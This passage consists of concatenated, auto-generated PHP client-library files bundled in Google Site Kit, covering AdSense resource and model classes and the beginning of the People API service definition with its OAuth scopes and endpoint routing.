WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListUrlChannelsResponse; use Google\Site_Kit_Dependencies\Google\Service\Adsense\UrlChannel; /** * The "urlchannels" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $urlchannels = $adsenseService->accounts_adclients_urlchannels; * </code> */ class AccountsAdclientsUrlchannels extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets information about the selected url channel. (urlchannels.get) * * @param string $name Required. The name of the url channel to retrieve. * Format: accounts/{account}/adclients/{adclient}/urlchannels/{urlchannel} * @param array $optParams Optional parameters. * @return UrlChannel * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\UrlChannel::class); } /** * Lists active url channels. (urlchannels.listAccountsAdclientsUrlchannels) * * @param string $parent Required. The ad client which owns the collection of * url channels. Format: accounts/{account}/adclients/{adclient} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of url channels to include in the * response, used for paging. If unspecified, at most 10000 url channels will be * returned. The maximum value is 10000; values above 10000 will be coerced to * 10000. * @opt_param string pageToken A page token, received from a previous * `ListUrlChannels` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListUrlChannels` must match the * call that provided the page token. * @return ListUrlChannelsResponse * @throws \Google\Service\Exception */ public function listAccountsAdclientsUrlchannels($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListUrlChannelsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsAdclientsUrlchannels::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_AccountsAdclientsUrlchannels'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\AdClient; use Google\Site_Kit_Dependencies\Google\Service\Adsense\AdClientAdCode; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAdClientsResponse; /** * The "adclients" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $adclients = $adsenseService->accounts_adclients; * </code> */ class AccountsAdclients extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets the ad client from the given resource name. (adclients.get) * * @param string $name Required. The name of the ad client to retrieve. Format: * accounts/{account}/adclients/{adclient} * @param array $optParams Optional parameters. * @return AdClient * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdClient::class); } /** * Gets the AdSense code for a given ad client. This returns what was previously * known as the 'auto ad code'. This is only supported for ad clients with a * product_code of AFC. For more information, see [About the AdSense * code](https://support.google.com/adsense/answer/9274634). * (adclients.getAdcode) * * @param string $name Required. Name of the ad client for which to get the * adcode. Format: accounts/{account}/adclients/{adclient} * @param array $optParams Optional parameters. * @return AdClientAdCode * @throws \Google\Service\Exception */ public function getAdcode($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('getAdcode', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdClientAdCode::class); } /** * Lists all the ad clients available in an account. * (adclients.listAccountsAdclients) * * @param string $parent Required. The account which owns the collection of ad * clients. Format: accounts/{account} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of ad clients to include in the * response, used for paging. If unspecified, at most 10000 ad clients will be * returned. The maximum value is 10000; values above 10000 will be coerced to * 10000. * @opt_param string pageToken A page token, received from a previous * `ListAdClients` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListAdClients` must match the * call that provided the page token. * @return ListAdClientsResponse * @throws \Google\Service\Exception */ public function listAccountsAdclients($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAdClientsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsAdclients::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_AccountsAdclients'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListSitesResponse; use Google\Site_Kit_Dependencies\Google\Service\Adsense\Site; /** * The "sites" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $sites = $adsenseService->accounts_sites; * </code> */ class AccountsSites extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets information about the selected site. (sites.get) * * @param string $name Required. Name of the site. Format: * accounts/{account}/sites/{site} * @param array $optParams Optional parameters. * @return Site * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\Site::class); } /** * Lists all the sites available in an account. (sites.listAccountsSites) * * @param string $parent Required. The account which owns the collection of * sites. Format: accounts/{account} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of sites to include in the * response, used for paging. If unspecified, at most 10000 sites will be * returned. The maximum value is 10000; values above 10000 will be coerced to * 10000. * @opt_param string pageToken A page token, received from a previous * `ListSites` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListSites` must match the call * that provided the page token. * @return ListSitesResponse * @throws \Google\Service\Exception */ public function listAccountsSites($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListSitesResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsSites::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_AccountsSites'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnit; use Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnitAdCode; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAdUnitsResponse; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListLinkedCustomChannelsResponse; /** * The "adunits" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $adunits = $adsenseService->accounts_adclients_adunits; * </code> */ class AccountsAdclientsAdunits extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates an ad unit. This method can be called only by a restricted set of * projects, which are usually owned by [AdSense for * Platforms](https://developers.google.com/adsense/platforms/) publishers. * Contact your account manager if you need to use this method. Note that ad * units can only be created for ad clients with an "AFC" product code. For more * info see the [AdClient * resource](/adsense/management/reference/rest/v2/accounts.adclients). For now, * this method can only be used to create `DISPLAY` ad units. See: * https://support.google.com/adsense/answer/9183566 (adunits.create) * * @param string $parent Required. Ad client to create an ad unit under. Format: * accounts/{account}/adclients/{adclient} * @param AdUnit $postBody * @param array $optParams Optional parameters. * @return AdUnit * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnit $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnit::class); } /** * Gets an ad unit from a specified account and ad client. (adunits.get) * * @param string $name Required. AdUnit to get information about. Format: * accounts/{account}/adclients/{adclient}/adunits/{adunit} * @param array $optParams Optional parameters. * @return AdUnit * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnit::class); } /** * Gets the ad unit code for a given ad unit. For more information, see [About * the AdSense code](https://support.google.com/adsense/answer/9274634) and * [Where to place the ad code in your * HTML](https://support.google.com/adsense/answer/9190028). (adunits.getAdcode) * * @param string $name Required. Name of the adunit for which to get the adcode. * Format: accounts/{account}/adclients/{adclient}/adunits/{adunit} * @param array $optParams Optional parameters. * @return AdUnitAdCode * @throws \Google\Service\Exception */ public function getAdcode($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('getAdcode', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnitAdCode::class); } /** * Lists all ad units under a specified account and ad client. * (adunits.listAccountsAdclientsAdunits) * * @param string $parent Required. The ad client which owns the collection of ad * units. Format: accounts/{account}/adclients/{adclient} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of ad units to include in the * response, used for paging. If unspecified, at most 10000 ad units will be * returned. The maximum value is 10000; values above 10000 will be coerced to * 10000. * @opt_param string pageToken A page token, received from a previous * `ListAdUnits` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListAdUnits` must match the * call that provided the page token. * @return ListAdUnitsResponse * @throws \Google\Service\Exception */ public function listAccountsAdclientsAdunits($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAdUnitsResponse::class); } /** * Lists all the custom channels available for an ad unit. * (adunits.listLinkedCustomChannels) * * @param string $parent Required. The ad unit which owns the collection of * custom channels. Format: * accounts/{account}/adclients/{adclient}/adunits/{adunit} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of custom channels to include in * the response, used for paging. If unspecified, at most 10000 custom channels * will be returned. The maximum value is 10000; values above 10000 will be * coerced to 10000. * @opt_param string pageToken A page token, received from a previous * `ListLinkedCustomChannels` call. Provide this to retrieve the subsequent * page. When paginating, all other parameters provided to * `ListLinkedCustomChannels` must match the call that provided the page token. * @return ListLinkedCustomChannelsResponse * @throws \Google\Service\Exception */ public function listLinkedCustomChannels($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('listLinkedCustomChannels', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListLinkedCustomChannelsResponse::class); } /** * Updates an ad unit. This method can be called only by a restricted set of * projects, which are usually owned by [AdSense for * Platforms](https://developers.google.com/adsense/platforms/) publishers. * Contact your account manager if you need to use this method. For now, this * method can only be used to update `DISPLAY` ad units. See: * https://support.google.com/adsense/answer/9183566 (adunits.patch) * * @param string $name Output only. Resource name of the ad unit. Format: * accounts/{account}/adclients/{adclient}/adunits/{adunit} * @param AdUnit $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask The list of fields to update. If empty, a full * update is performed. * @return AdUnit * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnit $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnit::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsAdclientsAdunits::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_AccountsAdclientsAdunits'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class PolicyTopic extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $mustFix; /** * @var string */ public $topic; /** * @param bool */ public function setMustFix($mustFix) { $this->mustFix = $mustFix; } /** * @return bool */ public function getMustFix() { return $this->mustFix; } /** * @param string */ public function setTopic($topic) { $this->topic = $topic; } /** * @return string */ public function getTopic() { return $this->topic; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\PolicyTopic::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_PolicyTopic'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class AdUnit extends \Google\Site_Kit_Dependencies\Google\Model { protected $contentAdsSettingsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\ContentAdsSettings::class; protected $contentAdsSettingsDataType = ''; /** * @var string */ public $displayName; /** * @var string */ public $name; /** * @var string */ public $reportingDimensionId; /** * @var string */ public $state; /** * @param ContentAdsSettings */ public function setContentAdsSettings(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ContentAdsSettings $contentAdsSettings) { $this->contentAdsSettings = $contentAdsSettings; } /** * @return ContentAdsSettings */ public function getContentAdsSettings() { return $this->contentAdsSettings; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setReportingDimensionId($reportingDimensionId) { $this->reportingDimensionId = $reportingDimensionId; } /** * @return string */ public function getReportingDimensionId() { return $this->reportingDimensionId; } /** * @param string */ public function setState($state) { $this->state = $state; } /** * @return string */ public function getState() { return $this->state; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnit::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_AdUnit'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class Account extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'pendingTasks'; /** * @var string */ public $createTime; /** * @var string */ public $displayName; /** * @var string */ public $name; /** * @var string[] */ public $pendingTasks; /** * @var bool */ public $premium; /** * @var string */ public $state; protected $timeZoneType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\TimeZone::class; protected $timeZoneDataType = ''; /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string[] */ public function setPendingTasks($pendingTasks) { $this->pendingTasks = $pendingTasks; } /** * @return string[] */ public function getPendingTasks() { return $this->pendingTasks; } /** * @param bool */ public function setPremium($premium) { $this->premium = $premium; } /** * @return bool */ public function getPremium() { return $this->premium; } /** * @param string */ public function setState($state) { $this->state = $state; } /** * @return string */ public function getState() { return $this->state; } /** * @param TimeZone */ public function setTimeZone(\Google\Site_Kit_Dependencies\Google\Service\Adsense\TimeZone $timeZone) { $this->timeZone = $timeZone; } /** * @return TimeZone */ public function getTimeZone() { return $this->timeZone; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Account::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Account'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ReportResult extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'warnings'; protected $averagesType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Row::class; protected $averagesDataType = ''; protected $endDateType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Date::class; protected $endDateDataType = ''; protected $headersType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Header::class; protected $headersDataType = 'array'; protected $rowsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Row::class; protected $rowsDataType = 'array'; protected $startDateType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Date::class; protected $startDateDataType = ''; /** * @var string */ public $totalMatchedRows; protected $totalsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Row::class; protected $totalsDataType = ''; /** * @var string[] */ public $warnings; /** * @param Row */ public function setAverages(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Row $averages) { $this->averages = $averages; } /** * @return Row */ public function getAverages() { return $this->averages; } /** * @param Date */ public function setEndDate(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Date $endDate) { $this->endDate = $endDate; } /** * @return Date */ public function getEndDate() { return $this->endDate; } /** * @param Header[] */ public function setHeaders($headers) { $this->headers = $headers; } /** * @return Header[] */ public function getHeaders() { return $this->headers; } /** * @param Row[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return Row[] */ public function getRows() { return $this->rows; } /** * @param Date */ public function setStartDate(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Date $startDate) { $this->startDate = $startDate; } /** * @return Date */ public function getStartDate() { return $this->startDate; } /** * @param string */ public function setTotalMatchedRows($totalMatchedRows) { $this->totalMatchedRows = $totalMatchedRows; } /** * @return string */ public function getTotalMatchedRows() { return $this->totalMatchedRows; } /** * @param Row */ public function setTotals(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Row $totals) { $this->totals = $totals; } /** * @return Row */ public function getTotals() { return $this->totals; } /** * @param string[] */ public function setWarnings($warnings) { $this->warnings = $warnings; } /** * @return string[] */ public function getWarnings() { return $this->warnings; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ReportResult::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ReportResult'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class AdBlockingRecoveryTag extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $errorProtectionCode; /** * @var string */ public $tag; /** * @param string */ public function setErrorProtectionCode($errorProtectionCode) { $this->errorProtectionCode = $errorProtectionCode; } /** * @return string */ public function getErrorProtectionCode() { return $this->errorProtectionCode; } /** * @param string */ public function setTag($tag) { $this->tag = $tag; } /** * @return string */ public function getTag() { return $this->tag; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\AdBlockingRecoveryTag::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_AdBlockingRecoveryTag'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Client; /** * Service definition for PeopleService (v1). * * <p> * Provides access to information about profiles and contacts.</p> * * <p> * For more information about this service, see the API * <a href="https://developers.google.com/people/" target="_blank">Documentation</a> * </p> * * @author Google, Inc. */ class PeopleService extends \Google\Site_Kit_Dependencies\Google\Service { /** See, edit, download, and permanently delete your contacts. */ const CONTACTS = "https://www.googleapis.com/auth/contacts"; /** See and download contact info automatically saved in your "Other contacts". */ const CONTACTS_OTHER_READONLY = "https://www.googleapis.com/auth/contacts.other.readonly"; /** See and download your contacts. */ const CONTACTS_READONLY = "https://www.googleapis.com/auth/contacts.readonly"; /** See and download your organization's GSuite directory. */ const DIRECTORY_READONLY = "https://www.googleapis.com/auth/directory.readonly"; /** View your street addresses. */ const USER_ADDRESSES_READ = "https://www.googleapis.com/auth/user.addresses.read"; /** See and download your exact date of birth. */ const USER_BIRTHDAY_READ = "https://www.googleapis.com/auth/user.birthday.read"; /** See and download all of your Google Account email addresses. */ const USER_EMAILS_READ = "https://www.googleapis.com/auth/user.emails.read"; /** See your gender. */ const USER_GENDER_READ = "https://www.googleapis.com/auth/user.gender.read"; /** See your education, work history and org info. */ const USER_ORGANIZATION_READ = "https://www.googleapis.com/auth/user.organization.read"; /** See and download your personal phone numbers. */ const USER_PHONENUMBERS_READ = "https://www.googleapis.com/auth/user.phonenumbers.read"; /** See your primary Google Account email address. */ const USERINFO_EMAIL = "https://www.googleapis.com/auth/userinfo.email"; /** See your personal info, including any personal info you've made publicly available. */ const USERINFO_PROFILE = "https://www.googleapis.com/auth/userinfo.profile"; public $contactGroups; public $contactGroups_members; public $otherContacts; public $people; public $people_connections; public $rootUrlTemplate; /** * Constructs the internal representation of the PeopleService service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://people.googleapis.com/'; $this->rootUrlTemplate = $rootUrl ?: 'https://people.UNIVERSE_DOMAIN/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v1'; $this->serviceName = 'people'; $this->contactGroups = new \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource\ContactGroups($this, $this->serviceName, 'contactGroups', ['methods' => ['batchGet' => ['path' => 'v1/contactGroups:batchGet', 'httpMethod' => 'GET', 'parameters' => ['groupFields' => ['location' => 'query', 'type' => 'string'], 'maxMembers' => ['location' => 'query', 'type' => 'integer'], 'resourceNames' => ['location' => 'query', 'type' => 'string', 'repeated' => \true]]], 'create' => ['path' => 'v1/contactGroups', 'httpMethod' => 'POST', 'parameters' => []], 'delete' => ['path' => 'v1/{+resourceName}', 'httpMethod' => 'DELETE', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'deleteContacts' => ['location' => 'query', 'type' => 'boolean']]], 'get' => ['path' => 'v1/{+resourceName}', 'httpMethod' => 'GET', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'groupFields' => ['location' => 'query', 'type' => 'string'], 'maxMembers' => ['location' => 'query', 'type' => 'integer']]], 'list' => ['path' => 'v1/contactGroups', 'httpMethod' => 'GET', 'parameters' => ['groupFields' => ['location' => 'query', 'type' => 'string'], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string'], 'syncToken' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'v1/{+resourceName}', 'httpMethod' => 'PUT', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->contactGroups_members = new \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource\ContactGroupsMembers($this, $this->serviceName, 'members', ['methods' => ['modify' => ['path' => 'v1/{+resourceName}/members:modify', 'httpMethod' => 'POST', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->otherContacts = new \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource\OtherContacts($this, $this->serviceName, 'otherContacts', ['methods' => ['copyOtherContactToMyContactsGroup' => ['path' => 'v1/{+resourceName}:copyOtherContactToMyContactsGroup', 'httpMethod' => 'POST', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1/otherContacts', 'httpMethod' => 'GET', 'parameters' => ['pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string'], 'readMask' => ['location' => 'query', 'type' => 'string'], 'requestSyncToken' => ['location' => 'query', 'type' => 'boolean'], 'sources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'syncToken' => ['location' => 'query', 'type' => 'string']]], 'search' => ['path' => 'v1/otherContacts:search', 'httpMethod' => 'GET', 'parameters' => ['pageSize' => ['location' => 'query', 'type' => 'integer'], 'query' => ['location' => 'query', 'type' => 'string'], 'readMask' => ['location' => 'query', 'type' => 'string']]]]]); $this->people = new \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource\People($this, $this->serviceName, 'people', ['methods' => ['batchCreateContacts' => ['path' => 'v1/people:batchCreateContacts', 'httpMethod' => 'POST', 'parameters' => []], 'batchDeleteContacts' => ['path' => 'v1/people:batchDeleteContacts', 'httpMethod' => 'POST', 'parameters' => []], 'batchUpdateContacts' => ['path' => 'v1/people:batchUpdateContacts', 'httpMethod' => 'POST', 'parameters' => []], 'createContact' => ['path' => 'v1/people:createContact', 'httpMethod' => 'POST', 'parameters' => ['personFields' => ['location' => 'query', 'type' => 'string'], 'sources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true]]], 'deleteContact' => ['path' => 'v1/{+resourceName}:deleteContact', 'httpMethod' => 'DELETE', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'deleteContactPhoto' => ['path' => 'v1/{+resourceName}:deleteContactPhoto', 'httpMethod' => 'DELETE', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'personFields' => ['location' => 'query', 'type' => 'string'], 'sources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true]]], 'get' => ['path' => 'v1/{+resourceName}', 'httpMethod' => 'GET', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'personFields' => ['location' => 'query', 'type' => 'string'], 'requestMask.includeField' => ['location' => 'query', 'type' => 'string'], 'sources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true]]], 'getBatchGet' => ['path' => 'v1/people:batchGet', 'httpMethod' => 'GET', 'parameters' => ['personFields' => ['location' => 'query', 'type' => 'string'], 'requestMask.includeField' => ['location' => 'query', 'type' => 'string'], 'resourceNames' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'sources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true]]], 'listDirectoryPeople' => ['path' => 'v1/people:listDirectoryPeople', 'httpMethod' => 'GET', 'parameters' => ['mergeSources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string'], 'readMask' => ['location' => 'query', 'type' => 'string'], 'requestSyncToken' => ['location' => 'query', 'type' => 'boolean'], 'sources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'syncToken' => ['location' => 'query', 'type' => 'string']]], 'searchContacts' => ['path' => 'v1/people:searchContacts', 'httpMethod' => 'GET', 'parameters' => ['pageSize' => ['location' => 'query', 'type' => 'integer'], 'query' => ['location' => 'query', 'type' => 'string'], 'readMask' => ['location' => 'query', 'type' => 'string'], 'sources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true]]], 